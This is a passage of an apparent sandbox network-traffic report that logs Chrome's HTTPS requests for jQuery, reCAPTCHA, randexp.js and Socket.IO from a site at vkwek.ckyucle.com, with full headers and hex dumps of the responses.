                                                              2024-07-03 07:41:05 UTC1369INData Raw: 17 bd 07 be a8 a9 00 2d 3a 4f d6 e1 0d 70 0b f4 8a e0 9c a5 69 07 3a 1f c1 db c9 f0 f2 79 f0 13 cb e0 fb fc c6 27 ed b7 bd 3d ac 5d 21 b0 b3 ad 2e f0 04 b6 61 ad 5b 68 b9 10 b6 63 0c 3c e1 58 d8 86 27 79 35 f4 ca 6f ac ef 26 d1 a5 c9 90 86 a9 90 f9 69 22 b5 b0 ba d0 e2 57 91 3f 13 16 73 16 f2 6d 3b a2 71 98 0b 1d 50 b6 05 84 34 c3 fa 42 92 0b d0 aa e6 6b 37 48 d4 71 d4 7f 5c fc e1 04 d0 60 32 d2 62 78 80 25 48 ef 23 2d 43 fa 00 e9 23 3c d7 5a b0 1a e9 53 d4 8f 5e 2b 44 95 6a 23 d2 56 cd 69 60 9a 05 8c 2c 48 45 12 da 1b 83 de 2a b5 1c 12 aa 5c 49 a8 43 cf ab 5d 39 3a 6c ee 2c 91 23 94 c2 73 4d 5d 0b 3c b2 0c 7d d2 9d a7 f0 54 bd 78 ab a3 2d 42 73 e5 bc c7 db 28 69 e8 49 1d e1 0e 9b 78 fb 40 7a 88 ee 43 9c 7c 14 3c 48 e2 30 b0 b0 50 3e 85 9b 00 90 39 66 ae
                                                              Data Ascii: -:Opi:y'=]!.a[hc<X'y5o&i"W?sm;qP4Bk7Hq\`2bx%H#-C#<ZS^+Dj#Vi`,HE*\IC]9:l,#sM]<}Tx-Bs(iIx@zC|<H0P>9f
                                                              2024-07-03 07:41:05 UTC1369INData Raw: cc 2c 49 c7 f0 4d 56 64 3e 23 ce b8 34 d4 96 47 4a c0 1c 9f 8f df e5 cd bc 08 e7 46 48 4a 19 62 c7 32 7b 4d 8f 27 ea 39 53 c8 f9 2e c8 fb 5e f8 a8 23 b2 9f 23 cc ab 0d ae 13 e5 b7 02 b1 e4 5e f3 64 25 c6 59 47 79 27 57 f2 6b bc 9d 17 71 0d 4a ef 32 29 64 e6 07 fd c8 0d f3 6c fe 2b ea 6c d0 ad f1 3a ea 09 3a e4 f0 74 68 df f6 d3 90 93 1a b3 57 63 bf f6 a8 68 37 cc 27 a1 a7 e9 68 b5 0a d7 0d 7a 3f a4 94 39 89 9e 85 1d 49 32 eb 54 3a bf 41 ae cc 6c 1f 3c b0 de 37 67 8f 01 8f 00 b7 9a d8 75 4d ae b4 25 0e 6d c9 3b f6 1e 10 a1 d8 5e b4 54 8d f4 85 ec 5f 3c c5 11 ab 67 ec 5a a7 77 cc a0 be 2e da da c8 b5 a6 d6 49 b3 93 c6 2e d5 d8 b6 7c b8 e5 6a 65 1e 2d 26 9e 73 c6 8d ba d7 72 11 33 17 78 ea 78 9b f2 7a bd 63 8f e7 be d6 9e 05 06 7e 56 cb f9 53 af e7 75 f5 d5
                                                              Data Ascii: ,IMVd>#4GJFHJb2{M'9S.^##^d%YGy'WkqJ2)dl+l::thWch7'hz?9I2T:Al<7guM%m;^T_<gZw.I.|je-&sr3xxzc~VSu
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 16 43 32 a2 ac 89 1e 6d 7b e6 31 7c f1 f7 3a b4 90 97 c3 ed 7d 71 d3 6e 84 68 79 ca f8 dc f1 8a 13 b3 46 8f 64 ca 90 57 04 ab fe 26 a2 a8 50 fc 31 a1 ac 4e 26 47 7d ab d2 e0 91 b2 86 88 7e c1 3e ae 8b 79 fb 60 7b 74 8e 13 fd 1f a1 b3 e5 e6 42 d7 57 d7 da bb 7d 81 6b 5b d1 7d 72 64 14 2e ba aa 47 10 8d d1 a3 4d c7 ea d9 76 a6 e5 08 d2 b5 51 8b 62 2d 64 94 25 38 e2 68 b6 89 9d c2 90 ce 46 91 fc d0 e9 7f 67 e7 e0 e8 ac fc 49 8d 8d 1a e2 cf e2 c4 e7 7f 04 5b 89 fb 43 d1 f2 e2 8e f9 8e da 56 c1 9e 6f 30 cf f6 9d de 6c 27 de 0b c0 7b d6 e9 55 03 53 4b 46 dc 79 a3 06 ef de 88 a8 16 bc 71 e4 0e 89 15 da 90 f5 76 e5 3d e8 ed 4d d4 ea 96 2f 6e 44 fe 1c 6c c5 94 f8 6b ab a2 c9 2d f7 76 46 bc 59 93 3b f7 a7 ef 8b f8 9d f6 c6 98 ed e4 57 23 a6 aa 8e b6 ef 90 f6 da d6
                                                              Data Ascii: C2m{1|:}qnhyFdW&P1N&G}~>y`{tBW}k[}rd.GMvQb-d%8hFgI[CVo0l'{USKFyqv=M/nDlk-vFY;W#
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 23 80 8f 03 a3 a5 9d 78 70 bb 01 8d f1 0f 5c 20 73 e7 f4 80 90 ec 7e 38 f0 a3 56 e0 c7 e8 e3 7d d2 4f 07 7e 26 30 b2 0d b8 df c0 03 2e 8c 72 e1 9b 3a 86 21 ce e9 26 ff 3e ac d3 30 c0 1d f4 8f 92 d2 69 00 75 81 cf f2 23 ea ba 0d 25 6f 13 b8 0c de f1 3c ba 07 d0 03 5e e4 7c ba 40 f4 b7 2b d9 bb f2 f4 57 71 69 64 ff 53 f4 70 99 b5 89 9e 99 f1 fe 4b 90 d6 75 a2 3b 01 57 d2 39 f4 5d fa 07 3a 13 d1 db c5 d0 7f e7 4b e9 db 4c bb 67 9b ef 91 cf d2 91 9c 1c ff 24 a0 b5 74 03 28 ab 50 d3 19 48 fd dd 73 92 b9 b3 ef 75 3a 07 ba da 43 fe 97 ef 7c e8 aa 4f 56 06 94 bc d9 1f cf 73 64 9d f3 76 48 59 7f c1 aa 7f 14 a8 36 41 d7 e4 40 ff 56 a1 ad 12 49 1e 7c e3 bd 13 0b dd 4d fe 39 2e 24 0b f4 68 03 2c 03 29 2e f8 0c e8 9a fc a0 71 2a 24 40 ff 3b e4 b9 b8 d6 2b d1 67 02 ce
                                                              Data Ascii: #xp\ s~8V}O~&0.r:!&>0iu#%o<^|@+WqidSpKu;W9]:KLg$t(PHsu:C|OVsdvHY6A@VI|M9.$h,).q*$@;+g
                                                              2024-07-03 07:41:05 UTC1369INData Raw: da 3a bd 9d 0f 9c 63 21 39 21 b9 6e ac 3b c1 9d ee 2e 76 33 dc 15 ee 2a 77 83 bb d9 dd e7 1e 74 0b dd d3 5e 4d af 8e e7 7a 3e 2f ca 6b e9 75 f0 62 bc a5 de 0a 2f cb cb f6 d6 45 d6 8a f4 45 46 45 4e 8b 4c f6 39 be 70 5f 15 5f 75 5f 1d 9f eb 6b e6 eb e2 8b f3 3d d4 78 7b d0 09 56 fc 65 d3 59 e7 6c 68 71 b1 e9 f3 68 41 07 6e a4 2f 03 4c d7 60 46 90 ca 72 b2 58 c3 7a b9 a6 2b cf 74 fd a0 33 4e 44 a9 ae 2d 4e 41 a9 ae 18 37 d1 9d e6 2e 74 d3 dd e5 6e 96 9b e3 e6 b9 7b dc 7c f7 47 f7 94 57 c3 8b f0 ea 79 9e e9 6a e1 b5 2f d7 b5 f2 5f 75 55 fb 8b ae 81 a6 8b 60 a8 e9 52 99 2e 4d 84 e2 4d a6 2f 86 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01
                                                              Data Ascii: :c!9!n;.v3*wt^Mz>/kub/EEFENL9p__u_k=x{VeYlhqhAn/L`FrXz+t3ND-NA7.tn{|GWyj/_uU`R.MM/X:Q+T"#Pc~2c?uI
                                                              2024-07-03 07:41:05 UTC1369INData Raw: bf 68 6e ae 66 24 8e 7d 5f 63 dd ad 18 fe a6 ff 2f f7 e0 48 1c b2 5f b8 86 07 10 29 77 0d 94 bb da 56 ae 12 b2 a3 52 05 42 25 2a c4 14 33 04 30 9f 14 5e 4b 90 15 6a 35 2d 17 f1 e9 d1 c8 8c 10 b7 07 f7 7c d3 af d8 6b dd ed c3 7e 30 12 fb 17 34 1b 0d 60 54 b1 df fa a9 f5 63 20 86 c1 4c 3a c3 70 bf e7 87 a0 95 ae a4 74 86 83 52 38 d4 c4 23 96 f5 2c c3 50 ba 17 53 ce 30 ae 2e 00 50 aa d5 6a 85 52 1b 8f 90 9e d5 b1 7a a4 65 75 f8 2d ac bd b6 ce 7a b1 ff 71 ec 9f 37 82 ee f0 43 77 d6 a3 32 e1 06 3f f4 99 35 07 ca 67 99 f7 a1 fc 9d 50 be 0f 13 ca c4 30 53 2d d9 2e 88 c7 84 7e cc 00 53 f9 46 86 65 09 e9 8c 67 99 12 71 1c e1 0e f2 42 e5 e1 61 be 9a 68 7d 58 4c 78 4c 48 90 26 d4 37 34 31 42 05 cd d2 e8 52 c3 b0 9f af 42 e9 ef ef e7 eb 89 f5 3a 94 9a 87 d3 d3 62 f4
                                                              Data Ascii: hnf$}_c/H_)wVRB%*30^Kj5-|k~04`Tc L:ptR8#,PS0.PjRzeu-zq7Cw2?5gP0S-.~SFegqBah}XLxLH&741BRB:b
                                                              2024-07-03 07:41:05 UTC1369INData Raw: 20 2a ef 78 d7 b5 cd 45 45 5b 6e 74 ff e5 22 3a 74 e6 cc b9 53 7f e5 87 cc 6d c7 17 37 9e 58 9a 61 3d 8f bf da d6 df b7 4b 50 42 bd 3d a3 67 f9 eb c0 1f 2d 93 c4 58 2c 53 c3 42 43 82 7d 78 cc fa 69 c0 20 c0 a5 be 64 0a 9e 9c 65 81 01 88 31 44 07 24 05 26 01 cb b4 48 3b 39 cb 94 5a a5 81 b0 2d c3 6c 30 6b 33 32 c6 f1 0e d9 78 46 3e e7 ce fa d1 f2 57 cb 5e e9 9d 37 9c fe 79 f7 27 e9 a9 c0 3b 67 3c 3c 26 dc 5d f2 a3 e6 57 cd 53 8f 19 a3 3f 6f fc a4 ec ad c9 78 79 1f 9d 93 83 99 54 4b 12 0b 76 02 99 91 c5 a9 bf 11 b4 36 5b cb d8 4d ff be 9a a0 00 4d b0 6f b0 4e 3d cd 57 09 52 85 60 06 06 51 8d 8c 84 e9 16 f4 06 30 58 9e 7d b9 85 f7 df 83 ba 5f 10 1e 67 15 ac 70 e7 22 7a b2 f3 d1 f5 d3 05 c3 d1 fb ce 1f 12 04 f6 ee ee 1f c5 58 d7 e3 55 d6 fd c0 ec a5 87 85 c7
                                                              Data Ascii: *xEE[nt":tSm7Xa=KPB=g-X,SBC}xi de1D$&H;9Z-l0k32xF>W^7y';g<<&]WS?oxyTKv6[MMoN=WR`Q0X}_gp"zXU
                                                              2024-07-03 07:41:05 UTC1369INData Raw: e6 70 cf 02 bd 11 4c b9 65 66 58 28 56 91 e1 64 93 29 7b 49 42 60 ed 03 9f cb 18 22 48 2e 36 7a 83 03 35 3e 6a 6f 2f 4f 0f 91 68 05 13 81 22 5c c7 a8 b6 1b 5a 7e 9e ec 18 e9 ec db 4d dd c5 79 d6 39 63 8e 50 de 92 69 ba a9 29 09 85 41 a5 86 35 c2 9c ee ea a2 0d 46 69 bc 85 9e 62 63 a7 96 c5 98 32 8d fa e9 a6 3c 42 73 99 50 85 5d e8 fc 01 d6 90 c6 c7 45 c1 51 25 20 cf 23 ac 8d 3a 6f 4f e0 23 cc 22 dc 18 45 30 7d 8c e3 61 54 6b 6f 99 e5 62 75 53 ae 29 61 46 48 99 b1 47 a8 5a 59 5b d6 17 45 d8 15 d2 5b 98 91 13 6d 98 9e 99 4d e6 2c a1 8a ce 59 09 c4 8f 57 20 c4 c6 c5 42 3f e2 52 e2 72 d2 99 8f 8e 3e 6d 19 58 10 76 dd 69 88 0e 0c f0 d3 78 7b b9 2a 99 04 94 60 d7 9d 64 90 39 ce 6a 0a a5 82 fc df 8e 4b 47 9b 7b e3 a6 f8 4f 09 1c 20 73 dd fd cf ff e0 dc c5 92 32
                                                              Data Ascii: pLefX(Vd){IB`"H.6z5>jo/Oh"\Z~My9cPi)A5Fibc2<BsP]EQ% #:oO#"E0}aTkobuS)aFHGZY[E[mM,YW B?Rr>mXvix{*`d9jKG{O s2


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              44192.168.2.662927151.101.66.1374434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:05 UTC677OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                              Host: code.jquery.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: script
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Range: bytes=64710-64710
                                                              If-Range: "28feccc0-15d9d"
                                                              2024-07-03 07:41:05 UTC616INHTTP/1.1 206 Partial Content
                                                              Connection: close
                                                              Content-Length: 1
                                                              Server: nginx
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                              ETag: "28feccc0-15d9d"
                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                              Access-Control-Allow-Origin: *
                                                              Via: 1.1 varnish, 1.1 varnish
                                                              Accept-Ranges: bytes
                                                              Age: 1397036
                                                              Content-Range: bytes 64710-64710/89501
                                                              Date: Wed, 03 Jul 2024 07:41:05 GMT
                                                              X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890023-NYC
                                                              X-Cache: HIT, HIT
                                                              X-Cache-Hits: 52, 0
                                                              X-Timer: S1719992465.414529,VS0,VE1
                                                              Vary: Accept-Encoding
                                                              2024-07-03 07:41:05 UTC1INData Raw: 6e
                                                              Data Ascii: n


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              45192.168.2.662926172.217.18.44434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:05 UTC696OUTGET /recaptcha/api.js HTTP/1.1
                                                              Host: www.google.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: script
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:05 UTC528INHTTP/1.1 200 OK
                                                              Content-Type: text/javascript; charset=utf-8
                                                              Expires: Wed, 03 Jul 2024 07:41:05 GMT
                                                              Date: Wed, 03 Jul 2024 07:41:05 GMT
                                                              Cache-Control: private, max-age=300
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Security-Policy: frame-ancestors 'self'
                                                              X-XSS-Protection: 1; mode=block
                                                              Server: GSE
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Accept-Ranges: none
                                                              Vary: Accept-Encoding
                                                              Connection: close
                                                              Transfer-Encoding: chunked
                                                              2024-07-03 07:41:05 UTC862INData Raw: 35 39 61 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                              Data Ascii: 59a/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                              2024-07-03 07:41:05 UTC579INData Raw: 6f 6e 4c 61 62 65 6c 29 7b 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 2e 67 65 74 56 61 6c 75 65 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 69 66 28 6c 21 3d 3d 27 74 72 65 61 74 6d 65 6e 74 5f 31 2e 31 27 26 26 6c 21 3d 3d 27 74 72 65 61 74 6d 65 6e 74 5f 31 2e 32 27 26 26 6c 21 3d 3d 27 63 6f 6e 74 72 6f 6c 5f 31 2e 31 27 29 7b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 7d 7d 29 3b 7d 65 6c 73 65 7b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 7d 70 6f 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 72 4b 62 54 76 78 54 78 77 63 77 35 56 71 7a 72 74 4e 2d 49 43 77 57 74 2f 72 65 63 61 70 74
                                                              Data Ascii: onLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m);}});}else{d.head.prepend(m);}po.src='https://www.gstatic.com/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recapt
                                                              2024-07-03 07:41:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              46192.168.2.662924140.82.121.44434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:05 UTC654OUTGET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1
                                                              Host: github.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: script
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:05 UTC995INHTTP/1.1 302 Found
                                                              Server: GitHub.com
                                                              Date: Wed, 03 Jul 2024 07:39:32 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T073932Z&X-Amz-Expires=300&X-Amz-Signature=aca7c6b73d5e3c084a388576b46174841ccd1d5d20df0b47f08acd7640c141a5&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                              Cache-Control: no-cache
                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                              X-Frame-Options: deny
                                                              X-Content-Type-Options: nosniff
                                                              X-XSS-Protection: 0
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              2024-07-03 07:41:05 UTC3031INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              47192.168.2.66292518.245.31.784434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:05 UTC624OUTGET /4.6.0/socket.io.min.js HTTP/1.1
                                                              Host: cdn.socket.io
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: script
                                                              Referer: https://vkwek.ckyucle.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:41:05 UTC703INHTTP/1.1 200 OK
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 45806
                                                              Connection: close
                                                              Accept-Ranges: bytes
                                                              Access-Control-Allow-Origin: *
                                                              Cache-Control: public, max-age=31536000, immutable
                                                              Content-Disposition: inline; filename="socket.io.min.js"
                                                              Date: Fri, 05 Jan 2024 09:12:45 GMT
                                                              ETag: "80f5b8c6a9eeac15de93e5a112036a06"
                                                              Server: Vercel
                                                              Strict-Transport-Security: max-age=63072000
                                                              X-Vercel-Cache: HIT
                                                              X-Vercel-Id: fra1::kcxpj-1704445965394-d209ffeb73cf
                                                              X-Cache: Hit from cloudfront
                                                              Via: 1.1 b8455bc5c5405f573b6e4da5524ee9e2.cloudfront.net (CloudFront)
                                                              X-Amz-Cf-Pop: FRA56-P8
                                                              X-Amz-Cf-Id: BjZvE924anJXDmwXdIYVrAyWfNtCo1-NxnG0-FnwWO2_LVwGOS_jbQ==
                                                              Age: 15664565
                                                              2024-07-03 07:41:05 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                              Data Ascii: /*! * Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
                                                              2024-07-03 07:41:06 UTC16384INData Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f
                                                              Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
                                                              2024-07-03 07:41:06 UTC13038INData Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68
                                                              Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
